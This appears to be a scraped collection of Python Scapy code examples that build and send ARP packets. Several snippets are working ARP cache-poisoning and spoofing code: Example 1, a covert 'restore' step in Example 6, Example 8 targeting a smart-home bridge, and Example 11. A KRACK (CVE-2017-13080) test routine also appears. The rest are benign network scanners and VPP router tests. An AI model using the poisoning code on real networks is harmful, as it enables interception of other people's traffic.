Ejemplo n.º 1
0
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while True:
        try:
            send(poison_target)
            send(poison_gateway)

            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip,gateway_mac,target_ip,target_mac)

    print "[*] APR poison attack finished."

    return
Ejemplo n.º 2
0
    def send_arp_req(self):

        if self.krack_state & 4 == 0:
            # Set the address for future uses
            self.arp_target_ip = self.dhcp_server.leases.get(
                self.client, self.arp_target_ip)
            assert self.arp_target_ip is not None

            # Send the first ARP requests, for control test
            log_runtime.info("Send ARP who-was from '%s' to '%s'",
                             self.arp_source_ip, self.arp_target_ip)
            arp_pkt = self.send_wpa_to_group(
                LLC() / SNAP() / ARP(op="who-has",
                                     psrc=self.arp_source_ip,
                                     pdst=self.arp_target_ip,
                                     hwsrc=self.mac),
                dest='ff:ff:ff:ff:ff:ff',
            )
            self.arp_sent.append(arp_pkt)
        else:
            if self.arp_to_send < len(self.arp_sent):
                # Re-send the ARP requests already sent
                self.send(self.arp_sent[self.arp_to_send])
                self.arp_to_send += 1
            else:
                # Re-send GTK
                self.arp_to_send = 0
                self.arp_retry += 1
                log_runtime.info("Trying to trigger CVE-2017-13080 %d/%d",
                                 self.arp_retry, self.ARP_MAX_RETRY)
                if self.arp_retry > self.ARP_MAX_RETRY:
                    # We retries 100 times to send GTK, then already sent ARPs
                    log_runtime.warning("Client is likely not vulnerable to "
                                        "CVE-2017-13080")
                    raise self.EXIT()

                raise self.RENEW_GTK()
Ejemplo n.º 3
0
    def _get_gw_mac_address(self, ip: IPv4Address) -> str:
        try:
            gw_ip = ipaddress.ip_address(ip.address)
            self.logger.debug("sending arp via egress: %s",
                              self.config.non_nat_arp_egress_port)
            eth_mac_src = get_if_hwaddr(self.config.non_nat_arp_egress_port)
            psrc = "0.0.0.0"
            egress_port_ip = get_if_addr(self.config.non_nat_arp_egress_port)
            if egress_port_ip:
                psrc = egress_port_ip

            pkt = Ether(dst=ETHER_BROADCAST, src=eth_mac_src)
            pkt /= ARP(op="who-has", pdst=gw_ip, hwsrc=eth_mac_src, psrc=psrc)
            self.logger.debug("ARP Req pkt %s", pkt.show(dump=True))

            res = srp1(pkt,
                       type=ETH_P_ARP,
                       iface=self.config.non_nat_arp_egress_port,
                       timeout=1,
                       verbose=0,
                       nofilter=1,
                       promisc=0)

            if res is not None:
                self.logger.debug("ARP Res pkt %s", res.show(dump=True))
                mac = res[ARP].hwsrc
                return mac
            else:
                self.logger.debug("Got Null response")
                return ""

        except Scapy_Exception as ex:
            self.logger.warning("Error in probing Mac address: err %s", ex)
            return ""
        except ValueError:
            self.logger.warning("Invalid GW Ip address: [%s]", ip)
            return ""
Ejemplo n.º 4
0
def button_push(val_eth_src_mac, val_eth_dst_mac, val_arp_src_mac,
                val_arp_dst_mac, val_src_ip, val_dst_ip, op, val_ifname):
    """
    ARP 报文发送
    构造数据包目标,
    告诉192.168.38.1这台主机网关地址为192.168.38.111所在的主机:
    :param EtherSRCMAC val_eth_src_mac: 源MAC地址
    :param EtherDSTMAC val_eth_dst_mac: 目标MAC地址
    :param hwsrc val_arp_src_mac: ARP 中的源MAC地址
    :param hwdst val_arp_dst_mac: ARP 目标MAC地址
    :param psrc val_src_ip: 源 IP
    :param pdst val_dst_ip: 目标 IP
    :param op: 操作码  1代表请求,为2代表回应
    :param val_ifname: 接口名
    :return:
    """
    print(val_eth_src_mac, val_eth_dst_mac, val_arp_src_mac, val_arp_dst_mac,
          val_src_ip, val_dst_ip, op, val_ifname)
    if op == 'request':
        op = 1
    else:
        op = 2

    # 构造ARP包
    result_raw = Ether(
        src=val_eth_src_mac,
        dst=val_eth_dst_mac) / \
                 ARP(
                     hwsrc=val_arp_src_mac,
                     hwdst=val_arp_dst_mac,
                     psrc=val_src_ip,
                     pdst=val_dst_ip,
                     op=op,
                 )
    # inter 请求间隔
    # iface 网络接口
    sendp(result_raw, inter=2, iface=val_ifname)
Ejemplo n.º 5
0
    def deal_common_pkt(self, pkt):
        # Send to DHCP server
        # LLC / SNAP to Ether
        if SNAP in pkt:
            ether_pkt = Ether(src=self.client,
                              dst=self.mac) / pkt[SNAP].payload
            self.dhcp_server.reply(ether_pkt)

        # If an ARP request is made, extract client IP and answer
        if ARP in pkt and \
           pkt[ARP].op == 1 and pkt[ARP].pdst == self.dhcp_server.gw:
            if self.arp_target_ip is None:
                self.arp_target_ip = pkt[ARP].psrc
                log_runtime.info("Detected IP: %s", self.arp_target_ip)

            # Reply
            ARP_ans = LLC() / SNAP() / ARP(
                op="is-at",
                psrc=self.arp_source_ip,
                pdst=self.arp_target_ip,
                hwsrc=self.mac,
                hwdst=self.client,
            )
            self.send_wpa_to_client(ARP_ans)
Ejemplo n.º 6
0
def restore(target, host):
    """
    Restores the normal process of a normal network by sending seven regular ARP packets.
    This is achieved by sending the original IP address and MAC of the gateway to the target.
    In the end everything looks as if nothing weird happened.
    If this is not called, the victim loses internet connection and that would be suspicious.

    TL:DR -> Everything back to normal, no flags raised.
    :param target: Target the attacker is trying to reach.
    :param host: The destination attacker is trying to reach
    """
    # Original information
    target_mac = get_mac(target)
    host_mac = get_mac(host)

    # Innocent ARP response
    arp_response = ARP(pdst=target, hwdst=target_mac, psrc=host, hwsrc=host_mac)

    # Send the innocent ARP packet to restore the network to its original condition.
    # Sent seven times for good measure
    send(arp_response, verbose=0, count=7)

    print("[->] Network restored")
    print("[->] Sent to {} : {} is-at {}".format(target, host, host_mac))
Ejemplo n.º 7
0
    def run(self, pipe):
        '''
            Will execute ARP request
        '''

        if self.trigger_pkt != None:
            self.log(
                "ARP: ---> sending provided trigger packet from {0} -> {1}".
                format(self.trigger_pkt[IP].src, self.trigger_pkt[IP].dst))
            pipe.async_tx_pkt(self.trigger_pkt)

        else:
            self.log("ARP: ---> who has '{0}' ? tell '{1}' ".format(
                self.dst_ip, self.src_ip))
            pkt = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.src_mac) / ARP(
                psrc=self.src_ip, pdst=self.dst_ip, hwsrc=self.src_mac)

            # add VLAN to the packet if needed
            self.vlan.embed(pkt, self.fmt)

            # send the ARP request
            pipe.async_tx_pkt(pkt)

            # wait for RX packet
        pkts = yield pipe.async_wait_for_pkt(time_sec=self.timeout_sec)
        if not pkts:
            self.log("ARP: <--- timeout for '{0}'".format(self.dst_ip))
            self.record = ARPRecord(self.src_ip, self.dst_ip)
            return

        # parse record
        response = Ether(pkts[0]['pkt'])

        self.record = ARPRecord(self.src_ip, self.dst_ip, response)
        self.log("ARP: <--- '{0} is at '{1}'".format(self.record.dst_ip,
                                                     self.record.dst_mac))
Ejemplo n.º 8
0
    def __init__(self):
        os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')

        test = subprocess.Popen(["arp", "-a"], stdout=subprocess.PIPE)
        output = test.communicate()[0]
        output = output.decode("utf-8").split("\n")
        self.arp_table = {}
        self.ipBridge = ""
        self.macBridge = ""
        self.stop_threads = False

        self.ipAttacker = socket.gethostbyname(socket.gethostname())
        self.macAttacker = ':'.join(("%012X" % get_mac())[i:i + 2] for i in range(0, 12, 2)).lower()
        print(self.macAttacker)

        for row in output:
            ip = re.search('([0-9]{1,3}\.){3}([0-9]{1,3})', row)
            mac = re.search('(([0-9]|[a-f]){2}\:){5}([0-9]|[a-f]){2}', row)
            if ip and mac:
                self.arp_table[ip.group(0)] = mac.group(0)
                if mac.group(0)[:8] == '00:17:88':
                    self.ipBridge = ip.group(0)
                    self.macBridge = mac.group(0)

        self.arp_poisson_packages = []

        for ip, mac in self.arp_table.items():
            if ip != self.ipAttacker:
                arp_poisson_package = Ether() / ARP()

                arp_poisson_package[ARP].hwsrc = self.macAttacker
                arp_poisson_package[ARP].psrc = self.ipBridge
                arp_poisson_package[ARP].pdst = ip
                arp_poisson_package[ARP].op = 2

                self.arp_poisson_packages.append(arp_poisson_package)
Ejemplo n.º 9
0
def network_scan(network):
    '''
    Detect the MAC addresses of all the devices connected in 
    the local network, using ARP protocol, and display them.

    Args:
        network (str): Network IP address to be evaluated
    '''

    #Create ARP request
    arp_head = ARP(pdst=network)
    ether_head = Ether(dst=BROADCAST_MAC)
    request = ether_head/arp_head
    
    #Send ARP request and wait for response
    responses_list = srp(request, timeout=1)[0]

    cprint(' ______________________________________', 'red')
    cprint("|", 'red', end='')
    cprint(" {:^15} ".format('IP address'), 'blue', 'on_green', end='')
    cprint("|", 'red', end='')
    cprint(" {:^18} ".format('MAC address'), 'blue', 'on_yellow', end='')
    cprint("|", 'red')

    #Check all the responses for sent packets
    for response in responses_list:
        #response[0]= packet sent
        #response[1]= response
        #print(response.show()) to see all fields of the response packet
        cprint("|", 'red', end='')
        cprint(" {:^15} ".format(response[1].psrc), 'green', end='')
        cprint("|", 'red',end='')
        cprint(" {:^18} ".format(response[1].hwsrc), 'yellow', end='')
        cprint("|", 'red')
    
    cprint('|_________________|____________________|', 'red', end='\n\n')
Ejemplo n.º 10
0
    def arp_scan_network_for_devices(self):
        """ Returns a list of devices which are currently active on the network """
        devices = []
        default_gateway = getNetworkScanner().get_default_gateway()
        ip = getDatabase().get_config("home_cidr")
        logging.info("[*] Scanning network (" + str(ip) +
                     ") for devices (this takes up to 30 seconds)")

        answered_list = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                            timeout=2,
                            retry=10)[0]

        for element in answered_list:
            if element[1].psrc != default_gateway:
                device = {}
                device["ip"] = element[1].psrc
                device["mac"] = element[1].hwsrc.upper()
                device["name"] = ""
                device["scanning"] = 0
                devices.append(device)

        #self.save_device_list()
        getDatabase().save_network_scan(devices)
        return devices
Ejemplo n.º 11
0
def sendspoofedreply(
        targetip, targetmac,
        sourceip):  # wysyłamy odpowiedzi ze złym source ip- spoofing
    spoofed = ARP(op=2, pdst=targetip, psrc=sourceip, hwdst=targetmac)
    send(spoofed, verbose=False)
Ejemplo n.º 12
0
    def test_pool_addr_fib(self):
        """ S-NAT add pool addresses to FIB """
        static_addr = '10.0.0.10'
        self.snat_add_address(self.snat_addr)
        self.vapi.snat_interface_add_del_feature(self.pg0.sw_if_index)
        self.vapi.snat_interface_add_del_feature(self.pg1.sw_if_index,
                                                 is_inside=0)
        self.snat_add_static_mapping(self.pg0.remote_ip4, static_addr)

        # SNAT address
        p = (Ether(src=self.pg1.remote_mac, dst='ff:ff:ff:ff:ff:ff') /
             ARP(op=ARP.who_has,
                 pdst=self.snat_addr,
                 psrc=self.pg1.remote_ip4,
                 hwsrc=self.pg1.remote_mac))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(1)
        self.assertTrue(capture[0].haslayer(ARP))
        self.assertTrue(capture[0][ARP].op, ARP.is_at)

        # 1:1 NAT address
        p = (Ether(src=self.pg1.remote_mac, dst='ff:ff:ff:ff:ff:ff') /
             ARP(op=ARP.who_has,
                 pdst=static_addr,
                 psrc=self.pg1.remote_ip4,
                 hwsrc=self.pg1.remote_mac))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(1)
        self.assertTrue(capture[0].haslayer(ARP))
        self.assertTrue(capture[0][ARP].op, ARP.is_at)

        # send ARP to non-SNAT interface
        p = (Ether(src=self.pg2.remote_mac, dst='ff:ff:ff:ff:ff:ff') /
             ARP(op=ARP.who_has,
                 pdst=self.snat_addr,
                 psrc=self.pg2.remote_ip4,
                 hwsrc=self.pg2.remote_mac))
        self.pg2.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(0)

        # remove addresses and verify
        self.snat_add_address(self.snat_addr, is_add=0)
        self.snat_add_static_mapping(self.pg0.remote_ip4,
                                     static_addr,
                                     is_add=0)

        p = (Ether(src=self.pg1.remote_mac, dst='ff:ff:ff:ff:ff:ff') /
             ARP(op=ARP.who_has,
                 pdst=self.snat_addr,
                 psrc=self.pg1.remote_ip4,
                 hwsrc=self.pg1.remote_mac))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(0)

        p = (Ether(src=self.pg1.remote_mac, dst='ff:ff:ff:ff:ff:ff') /
             ARP(op=ARP.who_has,
                 pdst=static_addr,
                 psrc=self.pg1.remote_ip4,
                 hwsrc=self.pg1.remote_mac))
        self.pg1.add_stream(p)
        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()
        capture = self.pg1.get_capture(0)
Ejemplo n.º 13
0
def arpPing(subnet=None):
    if (subnet is not None):
        ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=subnet),
                         timeout=2,
                         verbose=0)
        ans.summary()
Ejemplo n.º 14
0
    def test_gbp(self):
        """ Group Based Policy """

        nat_table = VppIpTable(self, 20)
        nat_table.add_vpp_config()
        nat_table = VppIpTable(self, 20, is_ip6=True)
        nat_table.add_vpp_config()

        #
        # Bridge Domains
        #
        self.vapi.bridge_domain_add_del(1,
                                        flood=1,
                                        uu_flood=1,
                                        forward=1,
                                        learn=0,
                                        arp_term=1,
                                        is_add=1)
        self.vapi.bridge_domain_add_del(2,
                                        flood=1,
                                        uu_flood=1,
                                        forward=1,
                                        learn=0,
                                        arp_term=1,
                                        is_add=1)
        self.vapi.bridge_domain_add_del(20,
                                        flood=1,
                                        uu_flood=1,
                                        forward=1,
                                        learn=0,
                                        arp_term=1,
                                        is_add=1)

        #
        # 3 EPGs, 2 of which share a BD.
        #
        epgs = []
        recircs = []
        epgs.append(
            VppGbpEndpointGroup(self, 220, 0, 1, self.pg4, self.loop0,
                                "10.0.0.128", "2001:10::128"))
        recircs.append(VppGbpRecirc(self, epgs[0], self.loop3))
        epgs.append(
            VppGbpEndpointGroup(self, 221, 0, 1, self.pg5, self.loop0,
                                "10.0.1.128", "2001:10:1::128"))
        recircs.append(VppGbpRecirc(self, epgs[1], self.loop4))
        epgs.append(
            VppGbpEndpointGroup(self, 222, 0, 2, self.pg6, self.loop1,
                                "10.0.2.128", "2001:10:2::128"))
        recircs.append(VppGbpRecirc(self, epgs[2], self.loop5))

        #
        # 2 NAT EPGs, one for floating-IP subnets, the other for internet
        #
        epgs.append(
            VppGbpEndpointGroup(self, 333, 20, 20, self.pg7, self.loop2,
                                "11.0.0.128", "3001::128"))
        recircs.append(VppGbpRecirc(self, epgs[3], self.loop6, is_ext=True))
        epgs.append(
            VppGbpEndpointGroup(self, 444, 20, 20, self.pg8, self.loop2,
                                "11.0.0.129", "3001::129"))
        recircs.append(VppGbpRecirc(self, epgs[4], self.loop8, is_ext=True))

        epg_nat = epgs[3]
        recirc_nat = recircs[3]

        #
        # 4 end-points, 2 in the same subnet, 3 in the same BD
        #
        eps = []
        eps.append(
            VppGbpEndpoint(self, self.pg0, epgs[0], recircs[0], "10.0.0.1",
                           "11.0.0.1"))
        eps.append(
            VppGbpEndpoint(self, self.pg1, epgs[0], recircs[0], "10.0.0.2",
                           "11.0.0.2"))
        eps.append(
            VppGbpEndpoint(self, self.pg2, epgs[1], recircs[1], "10.0.1.1",
                           "11.0.0.3"))
        eps.append(
            VppGbpEndpoint(self, self.pg3, epgs[2], recircs[2], "10.0.2.1",
                           "11.0.0.4"))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg0,
                           epgs[0],
                           recircs[0],
                           "2001:10::1",
                           "3001::1",
                           is_ip6=True))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg1,
                           epgs[0],
                           recircs[0],
                           "2001:10::2",
                           "3001::2",
                           is_ip6=True))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg2,
                           epgs[1],
                           recircs[1],
                           "2001:10:1::1",
                           "3001::3",
                           is_ip6=True))
        eps.append(
            VppGbpEndpoint(self,
                           self.pg3,
                           epgs[2],
                           recircs[2],
                           "2001:10:2::1",
                           "3001::4",
                           is_ip6=True))

        #
        # Config related to each of the EPGs
        #
        for epg in epgs:
            # IP config on the BVI interfaces
            if epg != epgs[1] and epg != epgs[4]:
                epg.bvi.set_table_ip4(epg.rd)
                epg.bvi.set_table_ip6(epg.rd)

                # The BVIs are NAT inside interfaces
                self.vapi.nat44_interface_add_del_feature(epg.bvi.sw_if_index,
                                                          is_inside=1,
                                                          is_add=1)
                self.vapi.nat66_add_del_interface(epg.bvi.sw_if_index,
                                                  is_inside=1,
                                                  is_add=1)

            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip4_n, 32)
            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip6_n,
                                                   128,
                                                   is_ipv6=True)

            # EPG uplink interfaces in the BD
            epg.uplink.set_table_ip4(epg.rd)
            epg.uplink.set_table_ip6(epg.rd)
            self.vapi.sw_interface_set_l2_bridge(epg.uplink.sw_if_index,
                                                 epg.bd)

            # add the BD ARP termination entry for BVI IP
            self.vapi.bd_ip_mac_add_del(bd_id=epg.bd,
                                        mac=mactobinary(self.router_mac),
                                        ip=epg.bvi_ip4_n,
                                        is_ipv6=0,
                                        is_add=1)
            self.vapi.bd_ip_mac_add_del(bd_id=epg.bd,
                                        mac=mactobinary(self.router_mac),
                                        ip=epg.bvi_ip6_n,
                                        is_ipv6=1,
                                        is_add=1)

            # epg[1] shares the same BVI to epg[0]
            if epg != epgs[1] and epg != epgs[4]:
                # BVI in BD
                self.vapi.sw_interface_set_l2_bridge(epg.bvi.sw_if_index,
                                                     epg.bd,
                                                     bvi=1)
                # BVI L2 FIB entry
                self.vapi.l2fib_add_del(self.router_mac,
                                        epg.bd,
                                        epg.bvi.sw_if_index,
                                        is_add=1,
                                        bvi_mac=1)

            # EPG in VPP
            epg.add_vpp_config()

        for recirc in recircs:
            # EPG's ingress recirculation interface maps to its RD
            recirc.recirc.set_table_ip4(recirc.epg.rd)
            recirc.recirc.set_table_ip6(recirc.epg.rd)

            # in the bridge to allow DVR. L2 emulation to punt to L3
            self.vapi.sw_interface_set_l2_bridge(recirc.recirc.sw_if_index,
                                                 recirc.epg.bd)
            self.vapi.sw_interface_set_l2_emulation(recirc.recirc.sw_if_index)

            self.vapi.nat44_interface_add_del_feature(
                recirc.recirc.sw_if_index, is_inside=0, is_add=1)
            self.vapi.nat66_add_del_interface(recirc.recirc.sw_if_index,
                                              is_inside=0,
                                              is_add=1)

            recirc.add_vpp_config()

        ep_routes = []
        ep_arps = []
        for ep in eps:
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            #
            # routes to the endpoints. We need these since there are no
            # adj-fibs due to the fact the the BVI address has /32 and
            # the subnet is not attached.
            #
            r = VppIpRoute(
                self,
                ep.ip,
                ep.ip_len,
                [VppRoutePath(ep.ip, ep.epg.bvi.sw_if_index, proto=ep.proto)],
                is_ip6=ep.is_ip6)
            r.add_vpp_config()
            ep_routes.append(r)

            #
            # ARP entries for the endpoints
            #
            a = VppNeighbor(self,
                            ep.epg.bvi.sw_if_index,
                            ep.itf.remote_mac,
                            ep.ip,
                            af=ep.af)
            a.add_vpp_config()
            ep_arps.append(a)

            # add each EP itf to the its BD
            self.vapi.sw_interface_set_l2_bridge(ep.itf.sw_if_index, ep.epg.bd)

            # add the BD ARP termination entry
            self.vapi.bd_ip_mac_add_del(bd_id=ep.epg.bd,
                                        mac=ep.bin_mac,
                                        ip=ep.ip_n,
                                        is_ipv6=0,
                                        is_add=1)

            # L2 FIB entry
            self.vapi.l2fib_add_del(ep.mac,
                                    ep.epg.bd,
                                    ep.itf.sw_if_index,
                                    is_add=1)

            # Add static mappings for each EP from the 10/8 to 11/8 network
            if ep.af == AF_INET:
                self.vapi.nat44_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0,
                                                       addr_only=1)
            else:
                self.vapi.nat66_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0)

            # VPP EP create ...
            ep.add_vpp_config()

            # ... results in a Gratuitous ARP/ND on the EPG's uplink
            rx = ep.epg.uplink.get_capture(1, timeout=0.2)

            if ep.is_ip6:
                self.assertTrue(rx[0].haslayer(ICMPv6ND_NA))
                self.assertEqual(rx[0][ICMPv6ND_NA].tgt, ep.ip)
            else:
                self.assertTrue(rx[0].haslayer(ARP))
                self.assertEqual(rx[0][ARP].psrc, ep.ip)
                self.assertEqual(rx[0][ARP].pdst, ep.ip)

            # add the BD ARP termination entry for floating IP
            self.vapi.bd_ip_mac_add_del(bd_id=epg_nat.bd,
                                        mac=ep.bin_mac,
                                        ip=ep.floating_ip_n,
                                        is_ipv6=ep.is_ip6,
                                        is_add=1)

            # floating IPs route via EPG recirc
            r = VppIpRoute(self,
                           ep.floating_ip,
                           ep.ip_len, [
                               VppRoutePath(ep.floating_ip,
                                            ep.recirc.recirc.sw_if_index,
                                            is_dvr=1,
                                            proto=ep.proto)
                           ],
                           table_id=20,
                           is_ip6=ep.is_ip6)
            r.add_vpp_config()
            ep_routes.append(r)

            # L2 FIB entries in the NAT EPG BD to bridge the packets from
            # the outside direct to the internal EPG
            self.vapi.l2fib_add_del(ep.mac,
                                    epg_nat.bd,
                                    ep.recirc.recirc.sw_if_index,
                                    is_add=1)

        #
        # ARP packets for unknown IP are flooded
        #
        pkt_arp = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
                   ARP(op="who-has",
                       hwdst="ff:ff:ff:ff:ff:ff",
                       hwsrc=self.pg0.remote_mac,
                       pdst=epgs[0].bvi_ip4,
                       psrc="10.0.0.88"))

        self.send_and_expect(self.pg0, [pkt_arp], self.pg0)

        #
        # ARP/ND packets get a response
        #
        pkt_arp = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
                   ARP(op="who-has",
                       hwdst="ff:ff:ff:ff:ff:ff",
                       hwsrc=self.pg0.remote_mac,
                       pdst=epgs[0].bvi_ip4,
                       psrc=eps[0].ip))

        self.send_and_expect(self.pg0, [pkt_arp], self.pg0)

        nsma = in6_getnsma(inet_pton(AF_INET6, eps[4].ip))
        d = inet_ntop(AF_INET6, nsma)
        pkt_nd = (Ether(dst=in6_getnsmac(nsma)) / IPv6(dst=d, src=eps[4].ip) /
                  ICMPv6ND_NS(tgt=epgs[0].bvi_ip6) /
                  ICMPv6NDOptSrcLLAddr(lladdr=self.pg0.remote_mac))
        self.send_and_expect(self.pg0, [pkt_nd], self.pg0)

        #
        # broadcast packets are flooded
        #
        pkt_bcast = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
                     IP(src=eps[0].ip, dst="232.1.1.1") /
                     UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.vapi.cli("clear trace")
        self.pg0.add_stream(pkt_bcast)

        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rxd = eps[1].itf.get_capture(1)
        self.assertEqual(rxd[0][Ether].dst, pkt_bcast[Ether].dst)
        rxd = epgs[0].uplink.get_capture(1)
        self.assertEqual(rxd[0][Ether].dst, pkt_bcast[Ether].dst)

        #
        # packets to non-local L3 destinations dropped
        #
        pkt_intra_epg_220_ip4 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))
        pkt_inter_epg_222_ip4 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst="10.0.1.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_assert_no_replies(self.pg0, pkt_intra_epg_220_ip4 * 65)

        pkt_inter_epg_222_ip6 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IPv6(src=eps[4].ip, dst="2001:10::99") /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
        self.send_and_assert_no_replies(self.pg0, pkt_inter_epg_222_ip6 * 65)

        #
        # Add the subnet routes
        #
        s41 = VppGbpSubnet(self, 0, "10.0.0.0", 24)
        s42 = VppGbpSubnet(self, 0, "10.0.1.0", 24)
        s43 = VppGbpSubnet(self, 0, "10.0.2.0", 24)
        s41.add_vpp_config()
        s42.add_vpp_config()
        s43.add_vpp_config()
        s61 = VppGbpSubnet(self, 0, "2001:10::1", 64, is_ip6=True)
        s62 = VppGbpSubnet(self, 0, "2001:10:1::1", 64, is_ip6=True)
        s63 = VppGbpSubnet(self, 0, "2001:10:2::1", 64, is_ip6=True)
        s61.add_vpp_config()
        s62.add_vpp_config()
        s63.add_vpp_config()

        self.send_and_expect_bridged(self.pg0, pkt_intra_epg_220_ip4 * 65,
                                     self.pg4)
        self.send_and_expect_bridged(self.pg3, pkt_inter_epg_222_ip4 * 65,
                                     self.pg6)
        self.send_and_expect_bridged6(self.pg3, pkt_inter_epg_222_ip6 * 65,
                                      self.pg6)

        self.logger.info(self.vapi.cli("sh ip fib 11.0.0.2"))
        self.logger.info(self.vapi.cli("sh gbp endpoint-group"))
        self.logger.info(self.vapi.cli("sh gbp endpoint"))
        self.logger.info(self.vapi.cli("sh gbp recirc"))
        self.logger.info(self.vapi.cli("sh int"))
        self.logger.info(self.vapi.cli("sh int addr"))
        self.logger.info(self.vapi.cli("sh int feat loop6"))
        self.logger.info(self.vapi.cli("sh vlib graph ip4-gbp-src-classify"))
        self.logger.info(self.vapi.cli("sh int feat loop3"))

        #
        # Packet destined to unknown unicast is sent on the epg uplink ...
        #
        pkt_intra_epg_220_to_uplink = (
            Ether(src=self.pg0.remote_mac, dst="00:00:00:33:44:55") /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg0,
                                     pkt_intra_epg_220_to_uplink * 65,
                                     self.pg4)
        # ... and nowhere else
        self.pg1.get_capture(0, timeout=0.1)
        self.pg1.assert_nothing_captured(remark="Flood onto other VMS")

        pkt_intra_epg_221_to_uplink = (
            Ether(src=self.pg2.remote_mac, dst="00:00:00:33:44:66") /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg2,
                                     pkt_intra_epg_221_to_uplink * 65,
                                     self.pg5)

        #
        # Packets from the uplink are forwarded in the absence of a contract
        #
        pkt_intra_epg_220_from_uplink = (
            Ether(src="00:00:00:33:44:55", dst=self.pg0.remote_mac) /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg4,
                                     pkt_intra_epg_220_from_uplink * 65,
                                     self.pg0)

        #
        # in the absence of policy, endpoints in the same EPG
        # can communicate
        #
        pkt_intra_epg = (
            Ether(src=self.pg0.remote_mac, dst=self.pg1.remote_mac) /
            IP(src=eps[0].ip, dst=eps[1].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg0, pkt_intra_epg * 65, self.pg1)

        #
        # in the abscense of policy, endpoints in the different EPG
        # cannot communicate
        #
        pkt_inter_epg_220_to_221 = (
            Ether(src=self.pg0.remote_mac, dst=self.pg2.remote_mac) /
            IP(src=eps[0].ip, dst=eps[2].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))
        pkt_inter_epg_221_to_220 = (
            Ether(src=self.pg2.remote_mac, dst=self.pg0.remote_mac) /
            IP(src=eps[2].ip, dst=eps[0].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))
        pkt_inter_epg_220_to_222 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst=eps[3].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_221 * 65)
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_222 * 65)

        #
        # A uni-directional contract from EPG 220 -> 221
        #
        c1 = VppGbpContract(self, 220, 221, 0)
        c1.add_vpp_config()

        self.send_and_expect_bridged(self.pg0, pkt_inter_epg_220_to_221 * 65,
                                     self.pg2)
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_222 * 65)

        #
        # contract for the return direction
        #
        c2 = VppGbpContract(self, 221, 220, 0)
        c2.add_vpp_config()

        self.send_and_expect_bridged(self.pg0, pkt_inter_epg_220_to_221 * 65,
                                     self.pg2)
        self.send_and_expect_bridged(self.pg2, pkt_inter_epg_221_to_220 * 65,
                                     self.pg0)

        #
        # check that inter group is still disabled for the groups
        # not in the contract.
        #
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_222 * 65)

        #
        # A uni-directional contract from EPG 220 -> 222 'L3 routed'
        #
        c3 = VppGbpContract(self, 220, 222, 0)
        c3.add_vpp_config()

        self.logger.info(self.vapi.cli("sh gbp contract"))

        self.send_and_expect_routed(self.pg0, pkt_inter_epg_220_to_222 * 65,
                                    self.pg3, self.router_mac)

        #
        # remove both contracts, traffic stops in both directions
        #
        c2.remove_vpp_config()
        c1.remove_vpp_config()
        c3.remove_vpp_config()

        self.send_and_assert_no_replies(self.pg2,
                                        pkt_inter_epg_221_to_220 * 65)
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_221 * 65)
